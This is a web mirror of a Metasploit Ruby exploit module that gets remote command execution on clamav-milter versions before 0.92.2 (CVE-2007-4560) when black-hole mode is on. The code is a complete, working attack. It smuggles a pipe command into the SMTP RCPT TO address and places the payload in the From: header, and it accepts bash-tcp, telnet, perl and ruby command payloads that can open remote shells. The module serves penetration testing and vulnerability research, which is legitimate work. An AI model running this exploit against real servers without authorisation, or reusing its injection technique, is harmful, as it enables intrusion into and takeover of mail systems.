Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/smtp/clamav_milter_blackhole.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::Smtp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'ClamAV Milter Blackhole-Mode Remote Code Execution',
16
'Description' => %q{
17
This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'
18
(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
19
When implemented with black hole mode enabled, it is possible to execute
20
commands remotely due to an insecure popen call.
21
},
22
'Author' => [ 'aushack' ],
23
'License' => MSF_LICENSE,
24
'References' => [
25
[ 'CVE', '2007-4560' ],
26
[ 'OSVDB', '36909' ],
27
[ 'BID', '25439' ],
28
[ 'EDB', '4761' ]
29
],
30
'Privileged' => true,
31
'Payload' => {
32
'DisableNops' => true,
33
'Space' => 1024,
34
'Compat' =>
35
{
36
'PayloadType' => 'cmd cmd_bash',
37
'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
38
}
39
},
40
'Platform' => 'unix',
41
'Arch' => ARCH_CMD,
42
'Targets' => [
43
[ 'Automatic', {}],
44
],
45
'DisclosureDate' => '2007-08-24',
46
'DefaultTarget' => 0,
47
'Notes' => {
48
'Reliability' => UNKNOWN_RELIABILITY,
49
'Stability' => UNKNOWN_STABILITY,
50
'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
}
52
)
53
)
54
55
register_options(
56
[
57
OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),
58
]
59
)
60
end
61
62
def exploit
63
# ClamAV writes randomized msg.###### temporary files in a randomized
64
# /tmp/clamav-#######################/ directory. This directory is
65
# the clamav-milter process working directory.
66
#
67
# We *can* execute arbitrary code directly from 'sploit', however the
68
# SMTP RFC rejects all payloads with the exception of generic CMD
69
# payloads due to the IO redirects. I discovered that the 'From:'
70
# header is written to this temporary file prior to the vulnerable
71
# call, so we call the file itself and payload.encoded is executed.
72
73
sploit = "sh msg*" # Execute the clamav-milter temporary file.
74
75
# Create the malicious RCPT TO before connecting,
76
# to make good use of the Msf::Exploit::Smtp support.
77
78
oldaddr = datastore['MAILTO']
79
newaddr = oldaddr.split('@')
80
81
datastore['MAILTO'] = "<#{newaddr[0]}+\"|#{sploit}\"@#{newaddr[1]}>"
82
83
connect_login
84
85
sock.put("From: ;#{payload.encoded}\r\n") # We are able to stick our payload in this header
86
sock.put(".\r\n")
87
88
# Clean up RCPT TO afterwards
89
90
datastore['MAILTO'] = oldaddr
91
92
handler
93
disconnect
94
end
95
end
96
97